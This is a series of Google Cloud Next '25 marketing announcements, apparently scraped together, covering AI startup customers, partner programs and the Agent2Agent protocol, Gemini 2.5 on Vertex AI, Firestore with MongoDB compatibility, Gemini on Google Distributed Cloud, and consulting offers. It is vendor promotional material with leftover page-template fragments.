Augment Codeis running its AI coding assistant, which specializes in helping developers navigate and contribute to production-grade codebases, on Google Cloud and is using Anthropic’s Claude models through Vertex AI.
Autoscience, a startup building AI agents to aid in scientific research, is using Google Cloud infrastructure and resources through our Startup Program as it begins to build and market its products.
Anysphere, the startup behind the AI-powered code editor Cursor, is now using Anthropic’s Claude models on Google Cloud to scale its AI coding assistant to more developers.
Big Sur AI now offers its AI-powered platform for retail and e-commerce customers on Google Cloud Marketplace.
Captions recently released its integration with Veo 2, making it easy for users to add B-roll content to the startup’s talking videos.
Eon.io, a startup focused on enterprise backup and recovery, has begun working with Google Cloud through our partnership with Lightspeed Capital; it’s now adding new AI search capabilities to its platform.
Features & Labels is a generative media platform for developers, accelerating the inference of gen AI models to improve the speed in which content is generated. The Fal team is working with Google Cloud to leverage its Veo 2 technology to help its users create videos with realistic motion and high-quality output.
Hebbiahas integrated Gemini models into its Matrix platform, which helps organizations build AI agents capable of working across all of their data.
Magic, which is building frontier-scale models capable of understanding very large codebases, is growing its use of GPUs on Google Cloud as it accelerates research and model training.
Photoroom, a French startup that provides gen AI photo-editing and design capabilities to consumers and businesses, has used Veo 2 and Imagen 3 to improve the quality of its offering and accelerate its development.
Physical Intelligence recently partnered with Google Cloud to support model development, using our secure and scalable AI infrastructure.
Spot AI is a video AI startup that transforms passive security cameras into AI Agents for improving security, safety, and operations in industries like manufacturing, retail, hospitals, construction and more. They’re using Google Cloud to power their new interface for building custom video AI agents, called Iris.
Storyis working with Google Cloud’s web3 services and infrastructure to bring new capabilities to developers on its platform.
Studyhall AI, which graduated from our UK Growth Accelerator program,has built a mobile application that uses Gemini models to help coach students on reading, writing, and exam prep.
Safe Superintelligence is partnering with Google Cloud to use TPUs to accelerate its research and development efforts toward building a safe, superintelligent AI.
Synthesia, a startup that operates an AI video platform, is using Google Cloud to build the next generation of advanced AI models that replicate realistic human likenesses and voice; the startup is also using Gemini models to handle complex vision and language-based tasks with speed and accuracy.
Ubie, a healthcare-focused startup founded in Japan, is using Gemini models via Google Cloud to power its physician assistance tool.
Udiois using TPUs to help train its models for music generation and serve its rapidly growing customer base.
Ufoniahelps physicians deliver care by using AI to automate clinical consultations with patients. It is using Google Cloud’s full AI stack to power its platform, including infrastructure, models on Vertex AI Model Garden, BigQuery, and GKE.
Wagestream, a financial services startup, is using Gemini models to handle more than 80% of its internal customer inquiries, including questions about pay dates, balances, and more.
Wondercraft, an AI-powered content studio that helps users create engaging audio ads, podcasts and more, is leveraging Gemini models for some of its core functionalities and will soon release a Veo 2 integration.
New partnerships with accelerators and VCs
We’re also expanding our work with leading venture capital firms and accelerators, building on our existing relationships with firms like Sequoia and YCombinator. These partnerships help provide technology like TPUs and Gemini models to fast-growing startup companies who are building with AI.
Today, we’re announcing a significant new partnership with the leading venture capital firm Lightspeed, which will make it easier for Lightspeed-backed startups to access technology and resources through the Google for Startups Cloud Program.
This includes upwards of $150,000 in cloud credits for Lightspeed’s AI portfolio companies, on top of existing credits available to all qualified startups through the Google for Startups Cloud Program. These credits help ensure participating startups will have more reliable access to cloud infrastructure and AI technology as they scale.
Lightspeed portfolio companies have already been using Google Cloud infrastructure, AI, and data tools, including Augment, Contextual, Grafana, and Mistral.
New resources to help startups build and go to market more quickly
Today we’re announcing new resources through the Google for Startups Cloud Program that will help startups access our infrastructure and technology more quickly.
We are also announcing our Startup Perks program, which provides early stage startups with preferred access to solutions from our partners like Datadog, Elastic, ElevenLabs, GitLab, MongoDB, NVIDIA, Weights & Biases, and more. Exclusive discounts and benefits will be added on a regular basis, helping startups build and grow with the best of the Google Cloud ecosystem.
Additionally, Google for Startups Cloud Program members will receive an additional $10,000 in credits to use exclusively on Partner Models through Vertex AI Model Garden, so they can quickly start using both Gemini models and models from partners like Anthropic and Meta.
We’re proud that 97% of companies who join our Google for Startups Cloud Program choose to stay with Google Cloud after their program credits expire, underscoring the value that our products are providing.
New accelerator cohort companies
Google Cloud currently offers a series of Accelerator programs for startups around the world. Today, we’re announcing the Spring 2025 cohort of companies in Google for Startups Cloud AI Accelerator for startups based in North America:
Future of AI: Perspectives for Startups
This year, we also launched our first-ever “Future of AI: Perspectives for Startups 2025” report. To gain a deeper understanding of where AI is headed, we gathered perspectives from 23 industry leaders and investors on their expectations for AI and what it means for startups in 2025 and beyond.
These experts weighed in on topics like the role of AI agents, the future of AI infrastructure, the areas startup investors are prioritizing, and much more. I encourage anyone involved in or interested in the AI startup world to take a look.
It’s this kind of fresh thinking and new technology that’s making Google Cloud a home for the startup community, and AI startups in particular — and we see Next ‘25 as an important extension of this growing ecosystem. With more that 60% of gen AI startups building on our platform today, we want to be a key partner for their innovation. This commitment to startups is ongoing, and will continue to grow with new resources, accelerators, and other programs that help them build and scale their businesses. Please be sure to visit the Startup Hub on the Mandalay Bay Expo Floor at Next ‘25 to learn more.
Since the beginning, partners have been core to Google Cloud — and that’s been especially true in the AI era. I’m amazed at the ways they have helped bring both Google’s AI innovations and their own incredible AI products and services to customers. Partners have already built more than 1,000 AI agent use cases for customers across nearly every industry.
The AI opportunity for Google Cloud partners is growing fast. For example, a new study from IDC1 found that global systems integrators will grow their Google Cloud AI practices as much as 100% this year — and almost half of their Google Cloud AI projects have already moved into widespread production thanks to initial ROI that customers are seeing. It’s clear that much of the opportunity ahead lies in agentic AI — and now, partners are infused at every layer of our AI agent stack.
This week at Google Cloud Next, we’re announcing updates that will help our partners build AI agents, power them with enterprise data and a choice of models, and bring them to customers, including through a new AI Agent Marketplace. We’re also launching a new open protocol, with support from more than 50 of the industry’s leading enterprise technology companies, which will allow AI agents to securely communicate in order to successfully complete tasks. And we’re enhancing the ways we go to market together, offering new incentives and resources for co-selling and training, as well as new AI offerings in Workspace for resellers.
We’re committed to helping all of our partners capitalize on the AI opportunity, whether they’re building new technology, integrating with our products, or delivering critical enterprise services.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15a0e41f0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Integrating our partners at every layer of the agentic AI stack
We’ve always taken an open approach to AI, and the same is true for agentic AI. With updates this week at Next ‘25, we’re now infusing partners at every layer of our agentic AI stack to enable multi-agent ecosystems. Here’s a closer look:
Agent2Agent (A2A) protocol: Today, we’re launching a new open protocol, with support and contributions from our partners, that will allow AI agents to communicate with each other, securely exchange information, and coordinate actions across various enterprise platforms or services like Atlassian, Box, Cohere, Intuit, Langchain, MongoDB, PayPal, Salesforce, SAP, ServiceNow, UKG and Workday. We believe the A2A framework will add significant value for customers, whose AI agents will now be able to work across their entire enterprise application estates. More partners can begin building with the A2A framework today and can learn more in our technical blog here.
AI Agent Marketplace: We’re also launching a new AI Agent Marketplace — a dedicated sectionwithin Google Cloud Marketplace that will easily allow customers to browse, purchase, and manage AI agents built by our partners. Today, partners like Accenture, BigCommerce, Deloitte Elastic, UiPath, Typeface, and VMware are offering agents through our AI Agent Marketplace, with additional agents launching soon from partners like Cognizant, Slalom, and Wipro.
Power agents with all your enterprise data: Data and AI models underpin all AI agents, and our open platform and agentic AI tooling make it possible for customers to train and fine-tune agents on their entire data estates. Today, we partner with companies like NetApp, Oracle, SAP, Salesforce, and ServiceNow — meaning customers with data stored in these popular platforms can now put this data to work to improve their AI agents.
Expert AI services: Our ecosystem of services partners — including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro — have actively contributed to the A2A protocol and will support its implementation. They’ve also significantly expanded their Google Cloud practices with new experts and technical resources over the past year. This means our customers now have access to a global community of highly-trained AI experts who can help them develop AI agent use cases and strategies with interoperability in mind; prototype new applications; train and manage AI models; and ultimately deploy AI agents across their businesses.
Simplifying the ways we help partners go to market
Across the board, for all types of partners, Google Cloud is increasing resources to help them address customer demand for AI and cloud implementation services — and to better help partners identify the largest, most strategic opportunities to grow their businesses. This includes a 2X increase in funding for AI opportunities over the past year alone, and builds on our existing, nine-figure investment in partner learning that we’ve made over the past four years.
In addition, we are continuing to refine the way we go-to-market with partners, to ensure partners have access to the right opportunities, and customers have access to the best possible technology and expertise. This includes:
Better field alignment and co-sell: Google Cloud has been co-selling with partners since our inception. Now, we’re introducing new processes to better capture and share partners’ critical contributions with our sales team. This includes increased visibility into the highly valuable co-selling activities like workshops, assessments, and proofs-of-concept, as well as partner-delivered services for migrations, application modernization, and other managed services. Ultimately, this information will better enable our sales team to connect customers with the correct ISV and services partners.
More partner earnings: We are continuing to evolve our incentives that help partners capitalize on the biggest opportunities, such as a 2x increase in partner funding for AI opportunities over the past year. We’re also introducing new AI-powered capabilities in Earnings Hub, our destination for tracking incentives and growth, which will enable partners to benchmark performance against peers, receive personalized tips on how to boost earnings, and more.
Supporting partner readiness: In the past four years, we’ve invested more than $100 million in partner training, and we are continuing to expand these efforts to help our ecosystem develop expertise in critical areas like Google Agentspace, Workspace, and more.
Making Google Workspace the best AI productivity platform for partners
More than 3 billion users and over 11 million paying customers rely on Google Workspace. Now, new enterprise-grade AI capabilities with Gemini are helping users get work done more quickly in tools like Gmail, Meet, Docs, and more. Our partners play a critical role in helping organizations around the world deploy Workspace, including providing critical migration support and training for organizations big and small around the world.
This week at Next, we’re announcing new AI innovations in Workspace, including proactive analysis and visualization capabilities in Sheets, audio generation in Docs, a new way to automate work with AI agents in the loop, and more—all of which will make Workspace an even more attractive platform for customers and ensure partners are going to market with category-defining products. In addition, we’ve increased partner funding for Workspace opportunities by 4x over the past year, to ensure partners have the right resources and incentives to bring Workspace to customers.
With simplified pricing, an enhanced Gemini-powered feature set, and the ability to integrate Workspace with customers’ existing tools like Slack, we’re creating new and exciting opportunities for partners to create long-term, strategic engagements by implementing Workspace for customers.
Announcing 2025 partner awards winners
In closing, we’re honored to spotlight this year’s winners of Google Cloud’s partner awards, which recognize the innovation and value that partners have created for customers—particularly with AI. Our ecosystem continues to evolve to meet the needs of businesses across industries, and we’re proud of the ways they have deployed Google Cloud’s technology to address complex challenges faced by our customers. To learn more about this year’s winners, please read the complete list.
I’m excited to meet with thousands of partners this week and share ideas for how we can work together to support customers, and how we can provide a simple, effective go-to-market motion with our ecosystem. See you at Next ‘25!
1. IDC InfoBrief, sponsored by Google Cloud, Google Cloud AI: Driving Opportunity and Growth for Global Consulting & Systems Integrator Partners, doc #US53276025, April 2025
We recently announced Gemini 2.5, our most intelligent AI model yet. Gemini 2.5 models are now thinking models, capable of reasoning before responding, resulting in dramatically improved performance. This transparent step-by-step reasoning is crucial for enterprise trust and compliance.
Our first model in this family, Gemini 2.5 Pro, available in public preview on Vertex AI, is now among the world’s best models for coding and tasks requiring advanced reasoning. It has state-of-the-art performance on a wide range of benchmarks, is recognized by many users as the most enterprise-ready reasoning model, and is at the top of the LM arena leaderboard by a significant margin.
Building on this momentum, we are launching Gemini 2.5 Flash, our workhorse model with low latency and cost efficiency on Vertex AI, our comprehensive platform for building and managing AI applications and agents, and Google AI Studio.
Let’s dive into how these capabilities are transforming AI development on Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d25fe80>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Advancing enterprise problem-solving with deep reasoning
Enterprises face challenges that require intricate information landscapes, multi-step analyses, and making nuanced decisions – tasks demanding that AI doesn’t just process, but also reasons. For these situations, we offer Gemini 2.5 Pro on Vertex AI, engineered for maximum quality and tackling the most complex tasks demanding deep reasoning and coding expertise. Coupled with a one million token context window, Gemini 2.5 Pro performs deep data analysis, extracts key insights from dense documents like legal contracts or medical records, and handles complex coding tasks by comprehending entire codebases.
“At Box, we’re redefining how enterprises apply intelligence to their content. With Box AI extract agents, powered by Gemini, users can instantly streamline tasks by making unstructured data actionable, as seen in millions of extractions supporting a variety of use cases, including procurement and reporting. Gemini 2.5 represents a leap forward in advanced reasoning, enabling us to envision building more powerful agent systems where extracted insights automatically trigger downstream actions and coordinate across multiple steps. This evolution pushes the boundaries of automation, allowing businesses to unlock and act upon their most valuable information with even greater impact and efficiency.” — Yashodha Bhavnani, VP of AI Product Management, Box
“Moody’s leverages Gemini’s advanced reasoning capabilities on Vertex AI within a model-agnostic framework. Our current production system uses Gemini 2.0 Flash for intelligent filtering and Gemini 1.5 Pro for high-precision extraction, achieving over 95% accuracy and an 80% reduction in processing time for complex PDFs. Building on this success, we are now in the early stages of testing Gemini 2.5 Pro. Its potential for deeper, structured reasoning across extensive document sets, thanks to features like its large context window, looks very promising for tackling even more complex data challenges and enhancing our data coverage further. While it’s not in production, the initial results are very encouraging.” — Wade Moss, Sr. Director, AI Data Solutions, Moody’s
To tailor Gemini for specific needs, businesses can soon leverage Vertex AI features like supervised tuning (for unique data specialization) and context caching (for efficient long context processing), enhancing performance and reducing costs. Both these features are launching in the coming weeks for Gemini 2.5 models.
Building responsive and efficient AI applications at scale
While Gemini 2.5 Pro targets peak quality for complex challenges, many enterprise applications prioritize speed, low latency, and cost-efficiency. To meet this need, we will soon offer Gemini 2.5 Flash on Vertex AI. This workhorse model is optimized specifically for low latency and reduced cost, delivering impressive and well-balanced quality for high-volume scenarios like customer service or real-time information processing. It’s the ideal engine for responsive virtual assistants and real-time summarization tools where efficiency at scale is key.
Gemini 2.5 Flash will also feature dynamic and controllable reasoning. The model automatically adjusts processing time (‘thinking budget’) based on query complexity, enabling faster answers for simple requests. You also gain granular control over this budget, allowing explicit tuning of the speed, accuracy, and cost balance for your specific needs. This flexibility is key to optimizing Flash performance in high-volume, cost-sensitive applications.
“Gemini 2.5 Flash’s enhanced reasoning ability, including its insightful responses, holds immense potential for Palo Alto Networks, including detection of future AI-powered threats and more effective customer support across our AI portfolio. We are focused on evaluating the latest model’s impact on AI-assistant performance, including its summaries and responses, with the intention of migrating to this model to unlock its advanced capabilities.” — Rajesh Bhagwat, VP of Engineering, Palo Alto Networks
Optimizing your experience on Vertex AI
Choosing between powerful models like Gemini 2.5 Pro and 2.5 Flash depends on your specific needs. To make it easier, we’re introducing Vertex AI Model Optimizer in experimental, to automatically generate the highest quality response for each prompt based on your desired balance of quality and cost. For customers who have workloads that do not require processing in a specific location, our Vertex AI Global Endpoint provides capacity-aware routing for our Gemini models across multiple regions, maintaining application responsiveness even during peak traffic or regional service fluctuations.
Powering the future with sophisticated agents and multi-agent ecosystems
Gemini 2.5 Pro’s advanced multimodal reasoning enables sophisticated, real-world agent workflows. It interprets visual context (maps, flowcharts), integrates text understanding, performs grounded actions like web searches, and synthesizes diverse information – allowing agents to interact meaningfully with complex inputs.
Building on this potential, today we are also announcing a number ofinnovations in Vertex AI to enable multi-agent ecosystems. One key innovation supporting dynamic, real-time interactions is the Live API for Gemini models. This API allows agents to process streaming audio, video, and text with low latency, enabling human-like conversations, participation in live meetings, or monitoring real-time situations (such as understanding spoken instructions mid-task).
Key Live API features further enhance these interactions: support for long, resumable sessions (greater than 30 minutes), multilingual audio output, time-stamped transcripts for analysis, dynamic instruction updates within sessions, and powerful tool integrations (search, code execution, function calling). These advancements pave the way for leveraging models like Gemini 2.5 Pro in highly interactive applications.
Get started
Ready to tackle complex problems, build efficient applications, and create sophisticated AI agents? Try Gemini 2.5 on Vertex AI now!
Today at Google Cloud Next, we’re thrilled to announce Firestore with MongoDB compatibility, built from the ground up by Google Cloud. It provides developers with an additional choice for their demanding document database workloads.
MongoDB compatibility has been a highly-requested capability from Firestore’s existing community of over 600,000 active developers. With this launch, Firestore developers can now take advantage of MongoDB’s API portability along with Firestore’s differentiated serverless service, to enjoy multi-region replication with strong consistency, virtually unlimited scalability, industry-leading high availability of up to 99.999% SLA, and single-digit milliseconds read performance.
When complemented with the ability to use their existing MongoDB application code, drivers, tools, in addition to the open-source ecosystem of MongoDB integrations, Firestore developers are able to quickly build applications for common use cases, including content management systems, e-commerce product catalogs, and user profiles.
Firestore with MongoDB compatibility also offers a customer-friendly serverless pricing model, with no up-front commitments required. Customers only pay for what they use without the hidden costs of capacity planning. You can learn more about how to get started at our Firestore with MongoDB compatibility site.
“After migrating to Firestore, we improved developer productivity by 55%, observed better service reliability, and have been able to seamlessly scale to over 250,000 requests per second and 30 billion documents. Because Firestore is completely serverless and provides virtually unlimited scalability, we no longer have to worry about managing our underlying database infrastructure — liberating us from database DevOps. This has enabled us to focus on product innovations that matter to our customers,” said Karan Agarwal, director of engineering, HighLevel.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d38baf0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Here’s how Firestore with MongoDB compatibility is different
Developers enjoy the agility of the popular MongoDB API and query language to store and query semi-structured Javascript Object Notation (JSON) data. With this announcement, we’re implementing the MongoDB API natively in the existing Firestore service, allowing developers to use their MongoDB drivers and integrations to read and write to Firestore with no application code changes. Developers can now build their applications, enjoying the best of the MongoDB ecosystem, and leveraging Firestore’s experience in designing and managing the most scalable and available serverless document database service.
Firestore utilizes disaggregated compute and storage layers that scale independently, in real-time. The Firestore compute layer implements multiple developer friendly APIs, including a Firestore with MongoDB compatibility API.
Benefits of Firestore with MongoDB compatibility:
1. Scale while maintaining performance, with zero intervention and downtime
At Firestore’s core is an intelligent, serverless document database service that serves some of the most demanding workloads in the world, powering more than 1.5 billion monthly active end-users. Firestore offers virtually unlimited horizontal scaling with zero customer intervention or downtime.
We’re able to do this through a differentiated backend that offers automatic, real-time rebalancing of disaggregated compute and storage that smooths out load across nodes. It allows us to add resources exactly where they are needed. We’re now able to bring the best of Google Cloud to the document databases ecosystem.
In this graph, Firestore is auto-scaling to handle a sudden database traffic spike of over 20,000 writes per second, while observing improved (lower) latency at scale.
2. Industry-leading availability
Firestore enables automatic, synchronous replication across different availability zones and regions. When any replica becomes unhealthy, Firestore will fail over to another replica with zero downtime and zero data loss. At the same time, it will apply automatic self-healing on the unhealthy replica. Unhealthy replicas will not affect processes such as automatic scaling.
Firestore handles regional and zonal failures with zero downtime and zero data loss, while applying automatic self-healing.
Firestore’s integration with Database Center simplifies database fleet management and is connected with Gemini Cloud Assist’s database improvement recommendations.
4. Transparent, simple pricing
Firestore makes keeping costs in check easier than ever. Pricing is transparent, predictable and simple. For read and write operations conducted on the database, customers simply pay for the actual operations conducted, based on the size of documents and index entries in 4 kilobyte chunks for reads and 1 kilobyte chunks for writes.
There are no upfront fees or hidden costs due to challenging cluster capacity planning, mismanaged cluster sharding, or I/O charges. Customers can also attain further discounts on the pricing on the operations conducted through one-year and three-year committed-use discounts. Storage is billed for actual storage consumed, and is inclusive of automatic data replication. Customers can explore examples of applied pricing here.
5. Maximize developer flexibility
Firestore offers developers more interface choices. Coming soon, we will also offer data interoperability between Firestore’s MongoDB compatible interface and Firestore’s innovative real-time and offline SDKs. This can allow developers to maximize existing libraries and tools from both of the MongoDB and Firestore developer communities.
Supercharge your applications with Firestore’s upcoming data interoperability, enabling you to utilize both MongoDB drivers and Firestore web & mobile SDKs on the same Firestore database.
Get started on Firestore with MongoDB compatibility
With this launch, Google Cloud is offering developers seeking a MongoDB interface multiple choices, including both MongoDB Atlas and Firestore. We’re thrilled to see what you’ll be able to achieve using Firestore with MongoDB compatibility. Firestore with MongoDB compatibility is available in preview as part of the new Firestore Enterprise edition. Get started today on Firestore with no upfront fees and a free tier.
Today we are announcing that Gemini will be available on Google Distributed Cloud (GDC), bringing Google’s most capable models to on-premises environments, with public preview starting in Q3 2025. To do so, we’ve partnered with NVIDIA to bring our Gemini models to NVIDIA Blackwell systems that you can purchase through Google or your preferred channels.
GDC is a fully managed on-prem and edge cloud solution that is offered in both connected and air-gapped options, scaling from a single server to hundreds of racks. It offers infrastructure-as-a-service, security, data, and AI services, and is extensible with a rich ISV ecosystem. GDC takes care of infrastructure management, making it easy for your developers to focus on leveraging the best that AI has to offer and build applications, assistants, and agents.
“NVIDIA and Google Distributed Cloud provide a secure AI platform, bringing Gemini models to enterprise datacenters and regulated industries. With NVIDIA Blackwell infrastructure and confidential computing, Google Distributed Cloud enhances privacy and security, and delivers industry-leading performance on DGX B200 and HGX B200 systems, available from Dell.” – Justin Boitano, VP, Enterprise AI Software, NVIDIA.
Historically, organizations that face strict regulatory, sovereignty, latency, or data volume issues have been unable to access the latest AI technology since they must keep their data on-premises. Their only options have been open-source models and tools. And, in most cases, they have to put together the software and hardware themselves, which increases operational burden and complexity. With Gemini on GDC, you don’t have to compromise between the best of AI and the need to keep your data on-premises.
Our GDC air-gapped product, which is now authorized for US Government Secret and Top Secret missions, and on which Gemini is available, provides the highest levels of security and compliance.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d2a3550>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Gemini on GDC: unlocking generative AI anywhere
Gemini models deliver breakthrough AI performance: they can analyze million-token contexts; are multimodal, i.e., can process diverse data formats such as text, image, audio and video; and operate globally across 100+ languages.
Further, the Gemini API offers AI inferencing without having to worry about infrastructure, OS management, or model lifecycle management. This enables you to:
Add your own business context: Use Retrieval Augment Generation (RAG) to personalize and augment the AI model’s output, eliminating the need for fine tuning or retraining the models.
Automate information processing and knowledge extraction: Improve employee efficiency by using gen AI to quickly summarize long documents, analyze sentiment in reports or feedback, or add captions to image, audio, and video content.
Create interactive conversational experiences: Build deeper customer relationships by enabling Gemini-powered customer support agents, chatbots via natural language, and employee assistants.
Tailor agents for your industry’s use case: Unlock highly specialized capabilities and workflows by developing tailored agents for everyone from financial advisors, to security assistants, to robotics.
“Gemini on Google Distributed Cloud will empower ServiceNow to augment powerful agentic AI capabilities such as reasoning in our existing systems via robust APIs. This strategic deployment allows us to explore and implement cutting-edge advancements while upholding our commitment to customer trust and data protection.” – Pat Casey, Chief Technology Officer & EVP of DevOps, ServiceNow
Vertex AI: one platform for cloud and on-prem
In addition to bringing Gemini to Google Distributed Cloud, customers today already benefit from the Vertex AI platform on GDC, which lets them accelerate the development, deployment, and management of agentic applications.
This complete AI platform offers:
Pre-trained APIs: Ready-to-use, task-optimized, pre-trained APIs based on advanced Google models for translation, speech-to-text, and optical character recognition (OCR). These APIs offer advanced features such as customizable glossaries and in-place document translation
Gen AI building tools: Open-source and third-party models with optimized inferencing on GKE, delivering fast startup and auto-scaling
Retrieval Augmented Generation (RAG): Grounding using Google Agentspace search and LLM API management and governance using Apigee on-prem
Built-in embeddings API and AlloyDB vector database: Powerful applications for personalization and recommendations, enabling improved user experiences
“With Google Distributed Cloud, Vertex AI, and Agentspace search, we will empower our Home Team innovators with a secure AI/ML platform and unified search, enabling the use of AI to enhance productivity and transform public safety for a safer and more secure future.” – Chee Wee Ang, Chief AI Officer, HTX
Google Agentspace: out-of-box access to on-prem data
Enterprises are eager to deploy gen AI, but they also struggle to connect large volumes of siloed information across various repositories and formats such as images, PDFs, and text. This hinders productivity and innovation. At the same time, building an in-house search solution is costly and requires access to scarce AI expertise.
We are excited to announce Google Agentspace search will be available on GDC, with public preview starting in Q3 2025. Google Agentspace search provides all enterprise knowledge workers with out-of-the-box capabilities that unify access to all your data in a secure, permissions-aware way.
Agentspace gives you access to:
Company-branded, multimodal search agent: A conversational search interface that can answer complex questions based on your company’s unique information, acting as a central source of enterprise truth for your entire organization
Pre-built enterprise data connectors: Connectors to index data from the most common on-prem enterprise systems (such as Confluence, Jira, ServiceNow, and Sharepoint)
Permissions-aware search results: Robust access control list (ACL) enforcement that help ensure that search results are permission-aware, maintaining security and compliance for all your on-prem data
Agentspace agents: Vertex AI is integrated out-of-the-box with Agentspace, starting with search agents, with more pre-built agents coming soon, and the ability to build your own
Get started with gen AI on GDC
We’re constantly innovating on GDC to be the leading gen AI and modern application development that you can deploy anywhere. To bring Gemini and gen AI to your premises, contact us at gdc-gemini@google.com or reach out to any of our accredited global partners.
Enterprise customers are coming to Google Cloud to transform their businesses with AI, and many are turning to our seasoned experts at Google Cloud Consulting to help implement these innovations.
Working alongside our many partners, Google Cloud Consulting teams are helping customers identify the right use cases for AI, deliver them safely and securely, and then generate strong ROI. In fact, engagements focused on implementing Google Cloud AI have become the fastest-growing area within our consulting practice over the past year — indicating the tremendous level of excitement around Google’s AI offerings.
This week at Google Cloud Next, we’re leaning into this success with the launch of several new offers, delivered by Google Cloud Consulting and our partners. These are all aimed at a simple, yet important goal: making it even easier for enterprises to capitalize on our entire portfolio of AI models, AI-optimized infrastructure, AI platforms, and agentic technologies.
We’re also expanding access to Delivery Navigator, a platform that offers a wide range of resources for teams working on cloud-based projects, including project plan templates, technical instructions, predictive insights, and smart recommendations.
And finally, to demonstrate the proven business impact of our work, we’re excited to showcase a pair of significant projects our team has completed with industry leaders: Airbus and Broadcom.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb086586a0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Accelerate Your Transformation: New Service Offerings
To accelerate our customers’ digital transformations and streamline technology adoption, we’re introducing three new pre-packaged service offerings. These tailored offers provide a clear and proven path that can lead enterprises from concept to deployment, enabling them to rapidly adopt our technologies and avoid costly missteps. Each offering can be customized to meet your unique needs, ensuring an efficient and effective technology implementation journey.
New offers available this week:
Agentspace Accelerator provides a structured approach to connecting and deploying AI-powered search within organizations, so employees can easily gain access to relevant internal information and resources when they need it. As part of this service offer, our team of experts facilitate the secure integrationof enterprise data with Gemini’s advanced reasoning and Google-quality search, along with customizable add-ons for cloud setup, data preparation, and strategic enablement. The Agentspace Accelerator offering is the stepping stone for organizations to create their own AI-powered agents, agentic workflows, and more within a single unified platform.
Optimize with TPUs helps customers migrate workloads to our purpose-built AI chips, TPUs, so they can maximize the spend and performance of their AI inference and training. TPUs are designed to scale cost-efficiently across a variety of use cases, including chatbots, code generation, media content creation, synthetic speech, personalization models, and recommendation engines. Through a six-week engagement, Google Cloud experts will develop a custom backend wrapper around your existing AI Infrastructure, enabling you to easily shift workloads to TPUs while maintaining the flexibility to toggle to other chips as needed.
Oracle on Google Cloud empowers customers to fully leverage the benefits of our partnership with Oracle, combining Oracle databases and applications with Google Cloud’s advanced platform and AI capabilities for enhanced database and network performance. Through a tailored engagement, Google Cloud experts will assist in deploying and optimizing Oracle through a variety of modalities, such as bring-your-own-licenses with Google Kubernetes Engine or Oracle Cloud Infrastructure with Google Cross-Cloud Interconnect. This offering enables customers to improve database and network speed, while gaining streamlined access to Google Cloud’s AI and data tools to help simplify the creation of AI-powered applications.
Next up: The AI-enhanced Delivery Navigator platform
To further empower our customers’ cloud journeys, we’re excited to expand access to Delivery Navigator, a platform designed to bring efficiency and confidence to Google Cloud projects. Currently, our partners and consulting teams use Delivery Navigator to access proven delivery methodologies and best practices that help them guide migrations and technology implementations efficiently and safely.
Starting in October, we will begin to roll out Delivery Navigator to customers as well, available in preview. This means participating customers will have direct access to the same frameworks, tooling, tips, and best practices used by Google Cloud’s own teams.
Built around a conversational AI-chat interface, Delivery Navigator offers a wide range of resources for teams working on cloud-based projects, including project plan templates, detailed technical instructions with example code, and predictive insights and smart recommendations to help teams proactively address technical challenges. It covers many of the common variables encountered during solution implementation, as well as rarer hurdles, and there’s plenty of guidance on how to optimize Google Cloud deployments and accelerate time-to-value.
By providing access to the same advanced frameworks and AI enhancements used by our own experts, Delivery Navigator enables a smoother, faster, and more successful path to realizing the full value of Google Cloud.
Bringing Cloud and AI Projects to Life
Customers are already achieving remarkable outcomes with the support of Google Cloud Consulting experts and our partner ecosystem, and this week, we’re excited to share our work with enterprise customers like Airbus and Broadcom. While each customer’s needs differ, the common theme is that Google Cloud Consulting is helping enterprises implement Google Cloud technology and migrate workloads within complex IT environments – and doing so safely and securely.
Airbus’ IT landscape has been streamlined in Canada through a strategic migration, within a post-merger integration context, from on-prem servers to Google Cloud. This transformation provides Airbus with enhanced visibility and ownership of its complex IT infrastructure in Canada, enabling the company to modernize their systems with the migration of more than 500 systems.
Leveraging robust infrastructure and migration tools, a rapid and seamless migration of 2.5 petabytes of data was achieved by Airbus, with on-time completion. This revamped tech stack helps Airbus to support the increase of production rates in Canada and contributes to strengthening airline trust.
Broadcom is driving its digital transformation by optimizing its compute and data landscape through a strategic VMware migration to Google Cloud — and boosting employee efficiency with the deployment of Gemini Code Assist.
Broadcom engaged a group of experts from Google Cloud Consulting to efficiently migrate twelve SaaS products, including their data infrastructures, while maintaining zero downtime. This unified data environment empowers Broadcom to access and analyze data with greater efficiency, leading to deeper product insights and enhanced customer experiences.
Furthermore, Broadcom is rolling out Gemini Code Assist to their employees, through a robust enablement program led by Google Cloud Consulting that features hands-on training, accessible office hours, and ongoing chat support.
Building the future together
At Google Cloud Consulting, we’re passionate about empowering businesses to thrive in the cloud and AI era. We’re committed to guiding customers every step of the way, from initial planning and implementation to ongoing optimization. Contact us today to discover how we can help you achieve your business objectives in this new era of technology.
Last year we announced Google Axion processors, our first custom Arm®-based CPUs. We built Axion to address our customers’ need for general-purpose processors that maximize performance, reduce infrastructure costs, and help them meet their sustainability goals.
